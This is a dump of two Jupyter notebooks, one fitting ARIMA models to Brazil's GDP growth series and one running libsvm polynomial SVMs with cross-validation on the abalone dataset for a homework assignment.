"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
cb026b2f6017681dd6b0b3974538c7cd99cbe43d | 664,884 | ipynb | Jupyter Notebook | Development Indicators Project/python notebooks/BR_GDP-growth.ipynb | autodidact-m/Projects | f4c0473adba42f3a629b62eb09d3b1df91982f46 | [
"Apache-2.0"
] | null | null | null | Development Indicators Project/python notebooks/BR_GDP-growth.ipynb | autodidact-m/Projects | f4c0473adba42f3a629b62eb09d3b1df91982f46 | [
"Apache-2.0"
] | null | null | null | Development Indicators Project/python notebooks/BR_GDP-growth.ipynb | autodidact-m/Projects | f4c0473adba42f3a629b62eb09d3b1df91982f46 | [
"Apache-2.0"
] | null | null | null | 462.688935 | 56,178 | 0.921532 | [
[
[
"import json\nimport requests\nimport csv\nimport pandas as pd\nimport os\nimport matplotlib.pylab as plt\nimport numpy as np\n%matplotlib inline\npd.options.mode.chained_assignment = None\nfrom statsmodels.tsa.arima_model import ARIMA\nimport statsmodels.api as sm\nimport operator\nfrom statsmodels.tsa.stattools import acf \nfrom statsmodels.tsa.stattools import pacf\nfrom pandas.tools.plotting import autocorrelation_plot",
"_____no_output_____"
],
[
"dateparse = lambda dates: pd.datetime.strptime(dates, '%Y-%m-%d')\nindicator_data = pd.read_csv('P:\\\\ADS\\\\Final\\\\Indicators_Cleaned.csv',header=0,parse_dates=True,index_col='Year',date_parser=dateparse, low_memory=False) \nindicator_data.head()",
"_____no_output_____"
],
[
"indicator_data.reset_index()\nindicator_data.head()",
"_____no_output_____"
],
[
"brazil_df_ind6 = indicator_data[(indicator_data['IndicatorCode'].isin(['NY.GDP.MKTP.KD.ZG'])) &\\\n (indicator_data['CountryCode'] == 'BR')]",
"_____no_output_____"
],
[
"brazil_df_ind6.index",
"_____no_output_____"
],
[
"ts = brazil_df_ind6['Value'] \nts1 = brazil_df_ind6[['Value']].copy() \nts1['Value']=ts1['Value']+20\nts1.head()",
"_____no_output_____"
],
[
"plt.plot(ts1)",
"_____no_output_____"
],
[
"from statsmodels.tsa.stattools import adfuller\ndef test_stationarity(timeseries):\n \n #Determing rolling statistics\n rolmean = pd.rolling_mean(timeseries, window=12)\n rolstd = pd.rolling_std(timeseries, window=12)\n\n #Plot rolling statistics:\n orig = plt.plot(timeseries, color='blue',label='Original')\n mean = plt.plot(rolmean, color='red', label='Rolling Mean')\n std = plt.plot(rolstd, color='black', label = 'Rolling Std')\n plt.legend(loc='best')\n plt.title('Rolling Mean & Standard Deviation')\n plt.show(block=False)\n \n #Perform Dickey-Fuller test:\n print ('Results of Dickey-Fuller Test:')\n dftest = adfuller(timeseries, autolag='AIC')\n dfoutput = pd.Series(dftest[0:4], index=['Test Statistic','p-value','#Lags Used','Number of Observations Used'])\n for key,value in dftest[4].items():\n dfoutput['Critical Value (%s)'%key] = value\n print (dfoutput)\ntest_stationarity(ts1.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
],
[
"decomposition = sm.tsa.seasonal_decompose(ts1, model='additive')\nfig = decomposition.plot()\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Taking Log",
"_____no_output_____"
]
],
[
[
"def logTransform(df):\n ts_log = np.log(df)\n plt.plot(ts_log)\n return ts_log",
"_____no_output_____"
],
[
"ts1_log = logTransform(ts1)",
"_____no_output_____"
],
[
"test_stationarity(ts1_log.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
]
],
[
[
"## Log first difference ",
"_____no_output_____"
]
],
[
[
"def logFirstDifference(ts1_log):\n ts1_log_diff = ts1_log - ts1_log.shift()\n ts1_log_diff.dropna(inplace=True)\n return ts1_log_diff",
"_____no_output_____"
],
[
"ts1_log_diff = logFirstDifference(ts1_log)\ntest_stationarity(ts1_log_diff.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
]
],
[
[
"## First difference ",
"_____no_output_____"
]
],
[
[
"def firstDifference(df):\n #ts_first_diff = df - df.shift()\n #ts_first_diff.dropna(inplace=True)\n ts_first_diff = df.diff()\n ts_first_diff.dropna(inplace=True)\n return ts_first_diff\n\n",
"_____no_output_____"
],
[
"ts1_first_diff = firstDifference(ts1)\ntest_stationarity(ts1_first_diff.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
],
[
"def expWeightedavg(ts1_log):\n expwighted_avg = pd.ewma(ts1_log, halflife=57)\n ts_log_ewma_diff = ts1_log - expwighted_avg\n ts1_log_diff.dropna(inplace=True)\n return ts1_log_diff",
"_____no_output_____"
],
[
"ts_log_ewma_diff = expWeightedavg(ts1_log)\ntest_stationarity(ts_log_ewma_diff.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:2: FutureWarning: pd.ewm_mean is deprecated for DataFrame and will be removed in a future version, replace with \n\tDataFrame.ewm(adjust=True,ignore_na=False,min_periods=0,halflife=57).mean()\n from ipykernel import kernelapp as app\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
],
[
"from statsmodels.tsa.seasonal import seasonal_decompose\n\ndecomposition = seasonal_decompose(ts1_log)\n\ntrend = decomposition.trend\nseasonal = decomposition.seasonal\nresidual = decomposition.resid\n\nplt.subplot(411)\nplt.plot(ts1_log, label='Original')\nplt.legend(loc='best')\nplt.subplot(412)\nplt.plot(trend, label='Trend')\nplt.legend(loc='best')\nplt.subplot(413)\nplt.plot(seasonal,label='Seasonality')\nplt.legend(loc='best')\nplt.subplot(414)\nplt.plot(residual, label='Residuals')\nplt.legend(loc='best')\nplt.tight_layout()",
"_____no_output_____"
],
[
"lag_acf = acf(ts1_log, nlags=10)\nlag_pacf = pacf(ts1_log, nlags=10, method='ols')",
"_____no_output_____"
],
[
"fig = plt.figure(figsize=(12,8))\nax1 = fig.add_subplot(211)\nfig = sm.graphics.tsa.plot_acf(ts1_log, lags=10, ax=ax1)\nax2 = fig.add_subplot(212)\nfig = sm.graphics.tsa.plot_pacf(ts1_log, lags=10, ax=ax2)",
"_____no_output_____"
]
],
[
[
"- As seen from the graph above both ACF and PACF are geometric hence this is an ARMA model",
"_____no_output_____"
]
],
[
[
"autocorrelation_plot(ts1_log)\nplt.show()",
"_____no_output_____"
],
[
"plt.subplot(122)\nplt.plot(lag_pacf)\nplt.axhline(y=0,linestyle='--',color='gray')\nplt.axhline(y=-1.96/np.sqrt(len(ts1_log)),linestyle='--',color='gray')\nplt.axhline(y=1.96/np.sqrt(len(ts1_log)),linestyle='--',color='gray')\nplt.title('Partial Autocorrelation Function')\nplt.tight_layout()",
"_____no_output_____"
],
[
"aic_metric = pd.DataFrame({'Modelname':[],'AIC':[]})\naic_dict = {}",
"_____no_output_____"
],
[
"def cal_aic_metric(modelname,model):\n global aic_metric\n AIC = model.aic\n aic_dict[modelname] = AIC\n df_error = pd.DataFrame({'Modelname':[modelname],'AIC':[AIC]})\n aic_metric = pd.concat([aic_metric,df_error])\n return aic_metric",
"_____no_output_____"
],
[
"def AR_Model(ts):\n model = ARIMA(ts, order=(2, 0, 0))\n results_AR = model.fit(disp=0)\n cal_aic_metric('ARIMA(ts, order=(2, 0, 0))',results_AR)\n print('Lag: %s' % results_AR.k_ar)\n print('Coefficients: %s' % results_AR.params)\n #print(results_AR.summary())\n predict_MA_HPI = np.exp(results_AR.predict(10, 10, dynamic=True))\n print(predict_MA_HPI)\n plt.plot(ts1_log)\n plt.plot(results_AR.fittedvalues, color='red')\n #print(np.exp(results_AR.fittedvalues))\n print(results_AR.aic)\n return results_AR",
"_____no_output_____"
],
[
"model_AR = AR_Model(ts1_log)",
"Lag: 2\nCoefficients: const 3.166285\nar.L1.Value 0.434568\nar.L2.Value 0.199589\ndtype: float64\n2006-01-01 24.993051\nFreq: -1AS-JAN, dtype: float64\n-45.272005733939636\n"
],
[
"def MA_Model(ts):\n model = ARIMA(ts, order=(0,0, 5))\n results_MA = model.fit(disp=0)\n cal_aic_metric('ARIMA(ts, order=(0, 0, 5))',results_MA)\n print('Lag: %s' % results_MA.k_ar)\n print('Coefficients: %s' % results_MA.params)\n print(results_MA.summary())\n plt.plot(ts)\n plt.plot(results_MA.fittedvalues, color='red')\n return results_MA",
"_____no_output_____"
],
[
"model_MA = MA_Model(ts1_log)",
"Lag: 0\nCoefficients: const 3.169758\nma.L1.Value 0.470765\nma.L2.Value 0.478736\nma.L3.Value 0.241620\nma.L4.Value 0.161593\nma.L5.Value -0.164789\ndtype: float64\n ARMA Model Results \n==============================================================================\nDep. Variable: Value No. Observations: 57\nModel: ARMA(0, 5) Log Likelihood 28.336\nMethod: css-mle S.D. of innovations 0.146\nDate: Wed, 16 Aug 2017 AIC -42.672\nTime: 19:39:15 BIC -28.371\nSample: 01-01-2016 HQIC -37.114\n - 01-01-1960 \n===============================================================================\n coef std err z P>|z| [95.0% Conf. Int.]\n-------------------------------------------------------------------------------\nconst 3.1698 0.042 76.034 0.000 3.088 3.251\nma.L1.Value 0.4708 0.131 3.607 0.001 0.215 0.727\nma.L2.Value 0.4787 0.147 3.251 0.002 0.190 0.767\nma.L3.Value 0.2416 0.155 1.557 0.126 -0.063 0.546\nma.L4.Value 0.1616 0.140 1.158 0.252 -0.112 0.435\nma.L5.Value -0.1648 0.137 -1.206 0.233 -0.433 0.103\n Roots \n=============================================================================\n Real Imaginary Modulus Frequency\n-----------------------------------------------------------------------------\nMA.1 -0.9965 -0.7926j 1.2733 -0.3931\nMA.2 -0.9965 +0.7926j 1.2733 0.3931\nMA.3 0.2675 -1.2096j 1.2389 -0.2154\nMA.4 0.2675 +1.2096j 1.2389 0.2154\nMA.5 2.4388 -0.0000j 2.4388 -0.0000\n-----------------------------------------------------------------------------\n"
],
[
"def Combined_Model(ts):\n model = ARIMA(ts, order=(2, 0, 2)) \n results_ARIMA = model.fit(disp=0)\n cal_aic_metric('ARIMA(ts, order=(1,0, 5))',results_ARIMA)\n print('Lag: %s' % results_ARIMA.k_ar)\n print('Coefficients: %s' % results_ARIMA.params)\n print(results_ARIMA.summary())\n plt.plot(ts)\n plt.plot(results_ARIMA.fittedvalues, color='red')\n return results_ARIMA",
"_____no_output_____"
],
[
"model_Combined = Combined_Model(ts1_log)",
"Lag: 2\nCoefficients: const 3.169695\nar.L1.Value 0.863542\nar.L2.Value -0.351457\nma.L1.Value -0.428471\nma.L2.Value 0.449811\ndtype: float64\n ARMA Model Results \n==============================================================================\nDep. Variable: Value No. Observations: 57\nModel: ARMA(2, 2) Log Likelihood 27.116\nMethod: css-mle S.D. of innovations 0.150\nDate: Wed, 16 Aug 2017 AIC -42.232\nTime: 19:38:00 BIC -29.974\nSample: 01-01-2016 HQIC -37.468\n - 01-01-1960 \n===============================================================================\n coef std err z P>|z| [95.0% Conf. Int.]\n-------------------------------------------------------------------------------\nconst 3.1697 0.041 77.351 0.000 3.089 3.250\nar.L1.Value 0.8635 0.359 2.403 0.020 0.159 1.568\nar.L2.Value -0.3515 0.371 -0.947 0.348 -1.079 0.376\nma.L1.Value -0.4285 0.349 -1.227 0.225 -1.113 0.256\nma.L2.Value 0.4498 0.306 1.470 0.148 -0.150 1.050\n Roots \n=============================================================================\n Real Imaginary Modulus Frequency\n-----------------------------------------------------------------------------\nAR.1 1.2285 -1.1559j 1.6868 -0.1202\nAR.2 1.2285 +1.1559j 1.6868 0.1202\nMA.1 0.4763 -1.4129j 1.4910 -0.1983\nMA.2 0.4763 +1.4129j 1.4910 0.1983\n-----------------------------------------------------------------------------\n"
],
[
"best_model = min(aic_dict.items(),key=operator.itemgetter(1))[0]\nprint('Best Model is ', best_model)",
"Best Model is ARIMA(ts, order=(2, 0, 0))\n"
],
[
"aic_metric",
"_____no_output_____"
],
[
"#Forecast using Best Model\ndef forecast(model,numSteps):\n #model.forecast(steps=numSteps)\n output = model.forecast(steps=numSteps)[0]\n #output.tolist()\n output = np.exp(output)\n output = output-20\n #out=normal(output)\n return output",
"_____no_output_____"
],
[
"forecast(model_AR,15)",
"_____no_output_____"
],
[
"def FittedValues(model):\n fittedVal=model.fittedvalues\n #PredictedVal=normal(fittedVal)\n #PredictedVal= fittedVal.tolist()\n fittedVal = np.exp(fittedVal)\n fittedVal = fittedVal-20\n print('Predicted existing values are:')\n return fittedVal\nFittedValues(model_AR)",
"Predicted existing values are:\n"
],
[
"def normal(predictions_ARIMA_diff):\n #predictions_ARIMA_diff = pd.Series(results_ARIMA.fittedvalues, copy=True)\n predictions_ARIMA_diff_cumsum = np.cumsum(np.concatenate((ts1.values[0], predictions_ARIMA_diff)))\n print('normalized')\n #predictions_ARIMA_diff_cumsum=np.absolute(predictions_ARIMA_diff_cumsum)\n return predictions_ARIMA_diff_cumsum",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb027434996781e209b49a41564500d112ed045c | 268,942 | ipynb | Jupyter Notebook | yk2516_hw2_q3.ipynb | YilunKuang/FML_HW2 | 52b04670bdfe4830a3544ca11f2cb2faaf4021ff | [
"BSD-3-Clause"
] | null | null | null | yk2516_hw2_q3.ipynb | YilunKuang/FML_HW2 | 52b04670bdfe4830a3544ca11f2cb2faaf4021ff | [
"BSD-3-Clause"
] | null | null | null | yk2516_hw2_q3.ipynb | YilunKuang/FML_HW2 | 52b04670bdfe4830a3544ca11f2cb2faaf4021ff | [
"BSD-3-Clause"
] | null | null | null | 200.553318 | 23,976 | 0.890575 | [
[
[
"# Question C | SVMs hand-on\nYilun Kuang (Mark)\n\nN15511943\n\nFML HW 2\n\n",
"_____no_output_____"
],
[
"## Question 1",
"_____no_output_____"
],
[
"```shell\n# Login to the computing cluster\nssh [email protected]\ncd /scratch/yk2516/svm\n\n# Download libsvm github repo\ngit clone https://github.com/cjlin1/libsvm.git\ncd libsvm\nmake\n\n# Install the libsvm pypi packages on the system\nsingularity exec --nv --overlay /scratch/yk2516/singularity/overlay-25GB-500K-0.ext3:rw /scratch/work/public/singularity/cuda11.3.0-cudnn8-devel-ubuntu20.04.sif /bin/bash -c \"\npip install -U libsvm-official\n\n\"\n\n```",
"_____no_output_____"
],
[
"## Question 2",
"_____no_output_____"
],
[
"```shell\n# Download the abalone dataset that is already scaled\nwget https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/regression/abalone_scale\n\n# Alternatively, get the raw data from the link below and do the preprocessing\nwget http://archive.ics.uci.edu/ml/machine-learning-databases/abalone/abalone.data\n```",
"_____no_output_____"
]
],
[
[
"import os\nimport numpy as np\nimport pandas as pd",
"_____no_output_____"
],
[
"def preprocess(train_length = 3133):\n pd_tmp = pd.read_csv('abalone.data',header=None)\n sex_map = {'M':(\"1 0 0\"),'F':(\"0 1 0\"),'I':(\"0 0 1\")}\n pd_tmp[0]=pd_tmp[0].apply(lambda x: sex_map[x])\n pd_sex = pd_tmp[0].str.split(expand=True)\n pd_tmp = pd_tmp.drop(columns=[0])\n pd_tmp = pd.concat([pd_sex, pd_tmp], axis=1)\n label_col = np.array(pd_tmp[8])\n new_label = np.ones(len(pd_tmp[8]),dtype=np.float64)\n ind_smaller_than_10 = np.where(label_col<=9)[0]\n new_label[ind_smaller_than_10]= np.float64(-1) # new_label is y_test now\n pd_tmp[8] = new_label\n pd_tmp.columns = range(pd_tmp.shape[1])\n cols = list(pd_tmp.columns)\n cols = [cols[-1]] + cols[:-1]\n pd_tmp = pd_tmp[cols]\n pd_tmp.columns = range(pd_tmp.shape[1])\n cols = list(pd_tmp.columns)\n for cols_name in cols:\n if cols_name != 0:\n pd_tmp[cols_name] = pd_tmp[cols_name].apply(lambda x: str(cols_name)+\":\"+str(x))\n pd_tmp[0] = pd_tmp[0].apply(lambda x: int(x))\n pd_tmp.to_csv('abalone_pre_scale.data',index=False,header=False,sep=\" \")\n train_set = pd_tmp[0:train_length]\n test_set = pd_tmp[train_length:]\n train_set.to_csv('abalone_pre_scale_train.data',index=False,header=False,sep=\" \")\n test_set.to_csv('abalone_pre_scale_test.data',index=False,header=False,sep=\" \")",
"_____no_output_____"
],
[
"preprocess()",
"_____no_output_____"
],
[
"os.system(\"./svm-scale -s scaling_paras/scale_par.txt abalone_pre_scale_train.data > abalone_scaled_train.data\")\nos.system(\"./svm-scale -r scaling_paras/scale_par.txt abalone_pre_scale_test.data > abalone_scaled_test.data\")",
"_____no_output_____"
]
],
[
[
"## Question 3",
"_____no_output_____"
]
],
[
[
"import scipy\nfrom libsvm.svmutil import *",
"_____no_output_____"
],
[
"y, x = svm_read_problem('abalone_scale', return_scipy = True)\n\n# Train & Test split\ntrain_length = 3133\ny_train, x_train = y[0:train_length], x[0:train_length, :]\ny_test, x_test = y[train_length:], x[train_length:, :]\n\n# Transform the train dataset into binary classification problem\nnew_label = np.ones(train_length,dtype=np.float64)\nind_smaller_than_10 = np.where(y_train<=9)[0]\nnew_label[ind_smaller_than_10]= np.float64(0) # new_label is y_test now\n\ntrain_dataset = np.array(list(map(lambda x,y: (x,y), x_train,new_label)))",
"_____no_output_____"
],
[
"# Transform the test dataset into binary classification problem\nnew_label_test = np.ones(len(y)-train_length,dtype=np.float64)\nind_smaller_than_10_test = np.where(y_test<=9)[0]\nnew_label_test[ind_smaller_than_10_test]= np.float64(0) # new_label is y_test now\n\ny_test = new_label_test",
"_____no_output_____"
],
[
"# Generate k-fold split\nk = 5\nlst_k_fold_dataset = []\nnp.random.shuffle(train_dataset)\nind_increment = int(np.floor(len(train_dataset)/k))\n\nstart_ind = 0\nend_ind = ind_increment\nfor i in range(k):\n lst_k_fold_dataset.append(train_dataset[start_ind:end_ind])\n start_ind += ind_increment\n end_ind += ind_increment",
"_____no_output_____"
],
[
"ploy_degree_lst = [1, 2, 3, 4, 5]\nk_val_sup = 9\nkernel_type = \"1\"",
"_____no_output_____"
],
[
"lst_acc_ploy_degree = []\n\nfor ploy_degree in ploy_degree_lst:\n lst_acc_k_val = []\n for k_val in range(-k_val_sup, k_val_sup): # C = -3k to 3k\n lst_cross_validation_acc = []\n for ind, train_set in enumerate(lst_k_fold_dataset):\n X_test_tmp = train_set[:,0]\n y_test_tmp = train_set[:,1]\n \n X_tmp = np.concatenate([lst_k_fold_dataset[i] for i,x in enumerate(lst_k_fold_dataset) if i!=ind])[:,0]\n y_tmp = np.concatenate([lst_k_fold_dataset[i] for i,x in enumerate(lst_k_fold_dataset) if i!=ind])[:,1]\n \n m = svm_train(y_tmp, scipy.sparse.vstack(X_tmp),\"-c %s -t %s -d %s -q\" % (3**k_val, kernel_type, ploy_degree))\n p_label, p_acc, p_val = svm_predict(y_test_tmp, scipy.sparse.vstack(X_test_tmp), m)\n \n lst_cross_validation_acc.append(p_acc[1])\n \n p_acc_cross_validated = np.mean(lst_cross_validation_acc)\n lst_acc_k_val.append(lst_cross_validation_acc)\n print(f\"Poly_Degree: {ploy_degree} | k: {k_val} | p_error_cross_validated is {p_acc_cross_validated}\")\n \n lst_acc_ploy_degree.append(lst_acc_k_val) ",
"Accuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 1 | k: -9 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 1 | k: -8 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 1 | k: -7 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 1 | k: -6 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 70.7668% (443/626) (classification)\nAccuracy = 70.607% (442/626) (classification)\nAccuracy = 71.5655% (448/626) (classification)\nAccuracy = 70.1278% (439/626) (classification)\nAccuracy = 73.0032% (457/626) (classification)\nPoly_Degree: 1 | k: -5 | p_error_cross_validated is 0.2878594249201278\nAccuracy = 71.246% (446/626) (classification)\nAccuracy = 72.524% (454/626) (classification)\nAccuracy = 72.524% (454/626) (classification)\nAccuracy = 68.8498% (431/626) (classification)\nAccuracy = 72.6837% (455/626) (classification)\nPoly_Degree: 1 | k: -4 | p_error_cross_validated is 0.2843450479233227\nAccuracy = 71.7252% (449/626) (classification)\nAccuracy = 73.1629% (458/626) (classification)\nAccuracy = 73.6422% (461/626) (classification)\nAccuracy = 70.4473% (441/626) (classification)\nAccuracy = 72.6837% (455/626) (classification)\nPoly_Degree: 1 | k: -3 | p_error_cross_validated is 0.2766773162939297\nAccuracy = 72.6837% (455/626) (classification)\nAccuracy = 72.6837% (455/626) (classification)\nAccuracy = 74.7604% (468/626) (classification)\nAccuracy = 71.7252% (449/626) (classification)\nAccuracy = 73.8019% (462/626) (classification)\nPoly_Degree: 1 | k: -2 | p_error_cross_validated is 0.2686900958466454\nAccuracy = 73.3227% (459/626) (classification)\nAccuracy = 73.3227% (459/626) (classification)\nAccuracy = 76.0383% (476/626) (classification)\nAccuracy = 72.0447% (451/626) (classification)\nAccuracy = 76.0383% (476/626) (classification)\nPoly_Degree: 1 | k: -1 | p_error_cross_validated is 0.2584664536741214\nAccuracy = 74.7604% (468/626) (classification)\nAccuracy = 74.9201% (469/626) (classification)\nAccuracy = 78.754% (493/626) (classification)\nAccuracy = 75.0799% (470/626) (classification)\nAccuracy = 78.754% (493/626) (classification)\nPoly_Degree: 1 | k: 0 | p_error_cross_validated is 0.2354632587859425\nAccuracy = 77.6358% (486/626) (classification)\nAccuracy = 77.476% (485/626) (classification)\nAccuracy = 79.8722% (500/626) (classification)\nAccuracy = 75.3994% (472/626) (classification)\nAccuracy = 80.9904% (507/626) (classification)\nPoly_Degree: 1 | k: 1 | p_error_cross_validated is 0.2172523961661342\nAccuracy = 78.754% (493/626) (classification)\nAccuracy = 78.4345% (491/626) (classification)\nAccuracy = 80.3514% (503/626) (classification)\nAccuracy = 75.0799% (470/626) (classification)\nAccuracy = 83.2268% (521/626) (classification)\nPoly_Degree: 1 | k: 2 | p_error_cross_validated is 0.20830670926517572\nAccuracy = 79.393% (497/626) (classification)\nAccuracy = 78.2748% (490/626) (classification)\nAccuracy = 79.8722% (500/626) (classification)\nAccuracy = 74.9201% (469/626) (classification)\nAccuracy = 83.0671% (520/626) (classification)\nPoly_Degree: 1 | k: 3 | p_error_cross_validated is 0.20894568690095844\nAccuracy = 79.7125% (499/626) (classification)\nAccuracy = 78.2748% (490/626) (classification)\nAccuracy = 80.1917% (502/626) (classification)\nAccuracy = 75.2396% (471/626) (classification)\nAccuracy = 83.2268% (521/626) (classification)\nPoly_Degree: 1 | k: 4 | p_error_cross_validated is 0.20670926517571883\nAccuracy = 79.7125% (499/626) (classification)\nAccuracy = 77.9553% (488/626) (classification)\nAccuracy = 80.9904% (507/626) (classification)\nAccuracy = 75.3994% (472/626) (classification)\nAccuracy = 83.5463% (523/626) (classification)\nPoly_Degree: 1 | k: 5 | p_error_cross_validated is 0.2047923322683706\nAccuracy = 80.0319% (501/626) (classification)\nAccuracy = 77.7955% (487/626) (classification)\nAccuracy = 80.8307% (506/626) (classification)\nAccuracy = 75.2396% (471/626) (classification)\nAccuracy = 83.7061% (524/626) (classification)\nPoly_Degree: 1 | k: 6 | p_error_cross_validated is 0.2047923322683706\nAccuracy = 80.0319% (501/626) (classification)\nAccuracy = 77.6358% (486/626) (classification)\nAccuracy = 80.8307% (506/626) (classification)\nAccuracy = 75.5591% (473/626) (classification)\nAccuracy = 83.8658% (525/626) (classification)\nPoly_Degree: 1 | k: 7 | p_error_cross_validated is 0.20415335463258785\nAccuracy = 80.0319% (501/626) (classification)\nAccuracy = 77.6358% (486/626) (classification)\nAccuracy = 80.9904% (507/626) (classification)\nAccuracy = 75.3994% (472/626) (classification)\nAccuracy = 84.0256% (526/626) (classification)\nPoly_Degree: 1 | k: 8 | p_error_cross_validated is 0.20383386581469648\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 2 | k: -9 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 2 | k: -8 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 2 | k: -7 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 2 | k: -6 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 54.6326% (342/626) (classification)\nPoly_Degree: 2 | k: -5 | p_error_cross_validated is 0.48817891373801914\nAccuracy = 72.8435% (456/626) (classification)\nAccuracy = 72.6837% (455/626) (classification)\nAccuracy = 72.524% (454/626) (classification)\nAccuracy = 69.9681% (438/626) (classification)\nAccuracy = 71.0863% (445/626) (classification)\nPoly_Degree: 2 | k: -4 | p_error_cross_validated is 0.2817891373801916\nAccuracy = 73.6422% (461/626) (classification)\nAccuracy = 73.3227% (459/626) (classification)\nAccuracy = 74.4409% (466/626) (classification)\nAccuracy = 69.6486% (436/626) (classification)\nAccuracy = 74.4409% (466/626) (classification)\nPoly_Degree: 2 | k: -3 | p_error_cross_validated is 0.2690095846645367\nAccuracy = 73.6422% (461/626) (classification)\nAccuracy = 72.8435% (456/626) (classification)\nAccuracy = 75.0799% (470/626) (classification)\nAccuracy = 71.4058% (447/626) (classification)\nAccuracy = 74.9201% (469/626) (classification)\nPoly_Degree: 2 | k: -2 | p_error_cross_validated is 0.2642172523961661\nAccuracy = 73.9617% (463/626) (classification)\nAccuracy = 73.9617% (463/626) (classification)\nAccuracy = 75.2396% (471/626) (classification)\nAccuracy = 71.7252% (449/626) (classification)\nAccuracy = 76.1981% (477/626) (classification)\nPoly_Degree: 2 | k: -1 | p_error_cross_validated is 0.25782747603833867\nAccuracy = 74.1214% (464/626) (classification)\n"
],
[
